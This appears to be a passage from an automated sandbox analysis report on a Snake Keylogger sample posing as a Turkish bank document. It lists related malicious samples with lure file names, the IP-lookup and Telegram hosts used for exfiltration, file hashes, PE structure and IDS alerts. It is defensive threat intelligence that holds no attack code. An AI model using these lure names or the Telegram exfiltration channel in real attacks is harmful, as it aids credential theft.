                                  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                    inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      193.122.6.168Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      SKMBT_C22024082310420.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • checkip.dyndns.org/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      reallyfreegeoip.orgSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      checkip.dyndns.comSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.6.168
                                      z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      api.telegram.orgSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                      • 149.154.167.220
                                      inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ORACLE-BMC-31898USCMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      http://ec44d1ee.freyy.pages.dev/Zimbra%20Web%20Client%20Sign%20In/Get hashmaliciousUnknownBrowse
                                      • 147.154.16.196
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.6.168
                                      SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                      • 193.122.130.0
                                      inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      TELEGRAMRUSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                      • 149.154.167.99
                                      https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                      • 149.154.167.99
                                      https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.99
                                      http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.99
                                      CLOUDFLARENETUSsostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 188.114.97.3
                                      asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 188.114.97.3
                                      https://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                      • 172.67.181.118
                                      HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                      • 162.159.61.3
                                      http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                      • 104.21.74.63
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                      • 104.21.37.97

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                      • 188.114.96.3
                                      inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      3b5074b1b5d032e5620f69f9f700ff0esostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 149.154.167.220
                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                      • 149.154.167.220
                                      asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 149.154.167.220
                                      RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                      • 149.154.167.220
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 149.154.167.220
                                      450230549.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      450230549.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1172
                                      Entropy (8bit):5.354777075714867
                                      Encrypted:false
                                      SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                      MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                      SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                      SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                      SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hy5dfaz2.cs4.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_namqra0d.f00.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_peoxt3mv.xfn.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjdhn1mk.2a0.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.804803461187065
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      File size:533'504 bytes
                                      MD5:b1ef1a6ce1c1851c95cb5625bc06e69d
                                      SHA1:feec17f1cea1f7e586a22b7970c3f8caa078a72f
                                      SHA256:597e62b3b65a0231ecd15b165241f46858d133ff7cea5762b9d90819e5a470ff
                                      SHA512:87ef4099ba43c511d7eb7cd61031ecdafbdb87c2ef855f051c585cb49ad14687473866d7f3f12fef9948263a14817c9d833963954298dd1aa258fdb6d79bac9b
                                      SSDEEP:12288:MbhAmVXT+Y/+luGM7LvBXL6AbH8sSXAKHxUdtTJv:ihAWL+lHMXvB76AbHKXAG
                                      TLSH:DFB41289251FD613C4A74BF806A1D3B057749ECDA112E2579FEBACFBFCAA70005407A6
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.%...............0..............)... ...@....@.. ....................................@................................

                                      File Icon

                                      Icon Hash:4bccc7a78d9931ab

                                      Static PE Info

                                      General

                                      Entrypoint:0x482912
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xC125EA6D [Wed Sep 7 15:25:33 2072 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x828bf0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x14ac.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x812580x70.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x809180x80a00989d8f1122e73c86b62671be6437cfbaFalse0.923630724611273data7.823687810026105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x840000x14ac0x16004bfa178c1aa7836b79508dacb4a4bb7cFalse0.33203125data4.687775370347689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x860000xc0x2009ecf7fdcb73b922401d6e642be0fbc31False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x841600x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors0.4913294797687861
                                      RT_ICON0x846c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors0.4444945848375451
                                      RT_GROUP_ICON0x84f700x22data0.9411764705882353
                                      RT_VERSION0x84f940x32cdata0.42610837438423643
                                      RT_MANIFEST0x852c00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-26T10:59:08.503535+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.6.16880TCP
                                      2024-09-26T10:59:10.425477+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.6.16880TCP
                                      2024-09-26T10:59:10.980972+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737188.114.96.3443TCP
                                      2024-09-26T10:59:11.691080+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                      2024-09-26T10:59:15.394378+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449743188.114.96.3443TCP
                                      2024-09-26T10:59:16.695132+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.96.3443TCP
                                      2024-09-26T10:59:25.370265+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449756149.154.167.220443TCP
                                      2024-09-26T10:59:35.513022+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449757149.154.167.220443TCP
                                      2024-09-26T10:59:36.500717+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449758149.154.167.220443TCP
                                      2024-09-26T10:59:37.436053+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449759149.154.167.220443TCP
